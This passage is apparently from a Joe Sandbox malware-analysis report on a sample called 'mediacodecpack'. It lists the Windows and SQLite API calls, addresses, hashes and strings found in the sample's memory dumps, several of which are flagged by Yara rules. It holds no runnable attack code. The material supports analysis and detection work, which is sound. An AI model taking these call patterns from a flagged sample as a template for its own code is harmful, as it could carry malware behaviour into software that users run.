                                                                                            • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                                            • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                                            APIs
                                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,96605425), ref: 02D506C0
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D506D5
                                                                                            • ResetEvent.KERNEL32(00000000,96605425), ref: 02D506DF
                                                                                            • CloseHandle.KERNEL32(00000000,96605425), ref: 02D50714
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,96605425), ref: 02D5078A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D5079F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandle$CreateOpenReset
                                                                                            • String ID:
                                                                                            • API String ID: 1285874450-0
                                                                                            • Opcode ID: 3b2ddc5084d9072de7971054bbd232d5adbef04bafc5e13a41d0fb9c7d842ebe
                                                                                            • Instruction ID: b4f42de637b913f94f6cc4881c7eb54160e9af2cc0c468fc5cebd9f2e5828143
                                                                                            • Opcode Fuzzy Hash: 3b2ddc5084d9072de7971054bbd232d5adbef04bafc5e13a41d0fb9c7d842ebe
                                                                                            • Instruction Fuzzy Hash: F4414071D04368ABDF10CFA5C848BAEBBB8EF09715F544619E819AB380D7749D05CFA1
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D420AC
                                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D420CD
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D420D8
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02D4213E
                                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02D4217A
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02D42187
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D421A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 1171374749-0
                                                                                            • Opcode ID: 1569a932770a95989d6349252e94cbc0b3f5f2dcc8c584f5085a5c4307f33b42
                                                                                            • Instruction ID: ca6cf3693f4cce48668cc5ed0d81c018fab03dcaa2eca2833e8f960908a77cd9
                                                                                            • Opcode Fuzzy Hash: 1569a932770a95989d6349252e94cbc0b3f5f2dcc8c584f5085a5c4307f33b42
                                                                                            • Instruction Fuzzy Hash: 53411671504701AFC321DF25D888A6BBBE9FBC8754F104A1EF89A82750DB30E945CFA2
                                                                                            APIs
                                                                                              • Part of subcall function 02D50EE0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02D5073E,?,?), ref: 02D50F0F
                                                                                              • Part of subcall function 02D50EE0: CloseHandle.KERNEL32(00000000,?,?,02D5073E,?,?), ref: 02D50F24
                                                                                              • Part of subcall function 02D50EE0: SetEvent.KERNEL32(00000000,02D5073E,?,?), ref: 02D50F37
                                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,96605425), ref: 02D506C0
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D506D5
                                                                                            • ResetEvent.KERNEL32(00000000,96605425), ref: 02D506DF
                                                                                            • CloseHandle.KERNEL32(00000000,96605425), ref: 02D50714
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02D50745
                                                                                              • Part of subcall function 02D531CA: RaiseException.KERNEL32(?,?,02D4EB63,?,?,?,?,?,?,?,02D4EB63,?,02D6ECA8,?), ref: 02D5321F
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,96605425), ref: 02D5078A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D5079F
                                                                                              • Part of subcall function 02D50C20: GetCurrentProcessId.KERNEL32(?), ref: 02D50C79
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,96605425), ref: 02D507AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                            • String ID:
                                                                                            • API String ID: 2227236058-0
                                                                                            • Opcode ID: 33ac56126d2db322ee67939d740b83aaa8701c720995212fafbc4ef6a2a4495c
                                                                                            • Instruction ID: 03678970799cb8e07253aed325d012890b7c73107176bfb2eb00f44e1c766c16
                                                                                            • Opcode Fuzzy Hash: 33ac56126d2db322ee67939d740b83aaa8701c720995212fafbc4ef6a2a4495c
                                                                                            • Instruction Fuzzy Hash: 45314F71D00369ABDF20DBA4DC44BADB7B9AF09316F144119EC19AB380E7B09D05CFA1
                                                                                            APIs
                                                                                            • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                              • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                            • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                            • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                            • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                            • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                            • sqlite3_free.SQLITE3 ref: 60963621
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                            • String ID:
                                                                                            • API String ID: 4276469440-0
                                                                                            • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                            • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                                            • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                            • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                            Strings
                                                                                            • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                            • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                            • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                            • API String ID: 4080917175-264706735
                                                                                            • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                            • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                            • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                            • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                            APIs
                                                                                              • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                            • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                            • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: library routine called out of sequence$out of memory
                                                                                            • API String ID: 2019783549-3029887290
                                                                                            • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                            • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                            • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                            • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                                            APIs
                                                                                            • __init_pointers.LIBCMT ref: 02D54A04
                                                                                              • Part of subcall function 02D570C0: RtlEncodePointer.NTDLL(00000000), ref: 02D570C3
                                                                                              • Part of subcall function 02D570C0: __initp_misc_winsig.LIBCMT ref: 02D570DE
                                                                                              • Part of subcall function 02D570C0: GetModuleHandleW.KERNEL32(kernel32.dll,?,02D6F248,00000008,00000003,02D6EC8C,?,00000001), ref: 02D57E41
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02D57E55
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02D57E68
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02D57E7B
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02D57E8E
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02D57EA1
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02D57EB4
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02D57EC7
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02D57EDA
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02D57EED
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02D57F00
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02D57F13
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02D57F26
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02D57F39
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02D57F4C
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02D57F5F
                                                                                            • __mtinitlocks.LIBCMT ref: 02D54A09
                                                                                            • __mtterm.LIBCMT ref: 02D54A12
                                                                                              • Part of subcall function 02D54A7A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02D574F6
                                                                                              • Part of subcall function 02D54A7A: _free.LIBCMT ref: 02D574FD
                                                                                              • Part of subcall function 02D54A7A: RtlDeleteCriticalSection.NTDLL(02D71978), ref: 02D5751F
                                                                                            • __calloc_crt.LIBCMT ref: 02D54A37
                                                                                            • __initptd.LIBCMT ref: 02D54A59
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02D54A60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                            • String ID:
                                                                                            • API String ID: 3567560977-0
                                                                                            • Opcode ID: 43220e355fa7f09756da57e8f51c391a5e52d83ff89fe09e7a606a33127ebacf
                                                                                            • Instruction ID: b385b743718d9bcfec691109ea56aba205e7ac688cfa00b9357e1e2be5c8821c
                                                                                            • Opcode Fuzzy Hash: 43220e355fa7f09756da57e8f51c391a5e52d83ff89fe09e7a606a33127ebacf
                                                                                            • Instruction Fuzzy Hash: B5F08C3254863119EEA47E38780666A6692DB01338F204A19EC25953C4FF908C819966
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02D52483,00000000), ref: 02D524EB
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D524F2
                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02D524FE
                                                                                            • RtlDecodePointer.NTDLL(00000001), ref: 02D5251B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                            • String ID: RoInitialize$combase.dll
                                                                                            • API String ID: 3489934621-340411864
                                                                                            • Opcode ID: 65cd9ab4c0fb68eb6d98caf05009cc2f9e7bb91aebc3203160c3fc7f54e852de
                                                                                            • Instruction ID: d25dda91014151a9d12ca5990b782714afacb7338cad8d839a818b5fc450c2bd
                                                                                            • Opcode Fuzzy Hash: 65cd9ab4c0fb68eb6d98caf05009cc2f9e7bb91aebc3203160c3fc7f54e852de
                                                                                            • Instruction Fuzzy Hash: BBE0ED71DD4200ABEF211BB0FC5DB143BB4A740746F605824F506D5384D7BC9CAC8A60
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D524C0), ref: 02D525C0
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D525C7
                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02D525D2
                                                                                            • RtlDecodePointer.NTDLL(02D524C0), ref: 02D525ED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                            • String ID: RoUninitialize$combase.dll
                                                                                            • API String ID: 3489934621-2819208100
                                                                                            • Opcode ID: a36643f0005cbe17366cbfbd61eaa013447067738aac570375cec982033b48b9
                                                                                            • Instruction ID: 6d6a9d069226b473c1094d88d2140f887ca3b8bd84500e9a1246f8b475bd9104
                                                                                            • Opcode Fuzzy Hash: a36643f0005cbe17366cbfbd61eaa013447067738aac570375cec982033b48b9
                                                                                            • Instruction Fuzzy Hash: 06E092B09C0200ABEB215B64F81DB143B78B705705F601814F506A6384EBBC9CBC8A60
                                                                                            APIs
                                                                                            • TlsGetValue.KERNEL32(0000002B,96605425,?,?,?,?,00000000,02D640D8,000000FF,02D511DA), ref: 02D50F7A
                                                                                            • TlsSetValue.KERNEL32(0000002B,02D511DA,?,?,00000000), ref: 02D50FE7
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D51011
                                                                                            • HeapFree.KERNEL32(00000000), ref: 02D51014
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: HeapValue$FreeProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1812714009-0
                                                                                            • Opcode ID: b6ce0349b7c34b39ff236d8fbe5b0aafaefc410fe07dcae9028e3fc340024546
                                                                                            • Instruction ID: 17613c7d2b6fe276c23ca0d027bb2469dde9003fa553ba96cc81c80405f9462b
                                                                                            • Opcode Fuzzy Hash: b6ce0349b7c34b39ff236d8fbe5b0aafaefc410fe07dcae9028e3fc340024546
                                                                                            • Instruction Fuzzy Hash: E351C0319043A49FDB20DF28D848B16BBE4EF49764F298658ED59A7380D7B5EC04CB91
                                                                                            APIs
                                                                                            • _ValidateScopeTableHandlers.LIBCMT ref: 02D62DB0
                                                                                            • __FindPESection.LIBCMT ref: 02D62DCA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FindHandlersScopeSectionTableValidate
                                                                                            • String ID:
                                                                                            • API String ID: 876702719-0
                                                                                            • Opcode ID: acdabba5b3f61fc306a798289f2dcb3e3ec69d5db648b5b3a844da9045619bd7
                                                                                            • Instruction ID: 1a05e07ae590e55df5e073c1d64840a5a50f0b9c69d9954ac3fcdceed19fb933
                                                                                            • Opcode Fuzzy Hash: acdabba5b3f61fc306a798289f2dcb3e3ec69d5db648b5b3a844da9045619bd7
                                                                                            • Instruction Fuzzy Hash: C9A1BC71E002158FCB25CF58D88CBB9B7A5FB48364F59462ADC45AB391E735ED40CBA0
                                                                                            APIs
                                                                                            • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                              • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                            • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                            • String ID: List of tree roots: $d$|
                                                                                            • API String ID: 3709608969-1164703836
                                                                                            • Opcode ID: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                            • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                            • Opcode Fuzzy Hash: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                            • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                            APIs
                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02D41CB1
                                                                                            • CloseHandle.KERNEL32(?), ref: 02D41CBA
                                                                                            • InterlockedExchangeAdd.KERNEL32(02D75264,00000000), ref: 02D41CC6
                                                                                            • TerminateThread.KERNEL32(?,00000000), ref: 02D41CD4
                                                                                            • QueueUserAPC.KERNEL32(02D41E7C,?,00000000), ref: 02D41CE1
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D41CEC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                            • String ID:
                                                                                            • API String ID: 1946104331-0
                                                                                            • Opcode ID: 330c35c9d725b7e4da442e9c8079353ec1acd55550fc4b172473906f7a05a6fd
                                                                                            • Instruction ID: f54c007c73b19fee1080a92ed8362741f5012d067c181991bb3aadc6da43065a
                                                                                            • Opcode Fuzzy Hash: 330c35c9d725b7e4da442e9c8079353ec1acd55550fc4b172473906f7a05a6fd
                                                                                            • Instruction Fuzzy Hash: D4F08C35940200BFE7205B96EC0DE5BBBBCEB867217504619F56A82290DB70EC90CBB0
                                                                                            APIs
                                                                                              • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                              • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                              • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                              • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                            • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                            • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                            • String ID: e
                                                                                            • API String ID: 786425071-4024072794
                                                                                            • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                            • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                                            • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                            • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_exec
                                                                                            • String ID: sqlite_master$sqlite_temp_master$|
                                                                                            • API String ID: 2141490097-2247242311
                                                                                            • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                            • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                                            • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                            • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                                            APIs
                                                                                            • std::exception::exception.LIBCMT ref: 02D5098F
                                                                                              • Part of subcall function 02D514E3: std::exception::_Copy_str.LIBCMT ref: 02D514FC
                                                                                              • Part of subcall function 02D4FD60: __CxxThrowException@8.LIBCMT ref: 02D4FDBE
                                                                                            • std::exception::exception.LIBCMT ref: 02D509EE
                                                                                            Strings
                                                                                            • boost unique_lock has no mutex, xrefs: 02D5097E
                                                                                            • $, xrefs: 02D509F3
                                                                                            • boost unique_lock owns already the mutex, xrefs: 02D509DD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
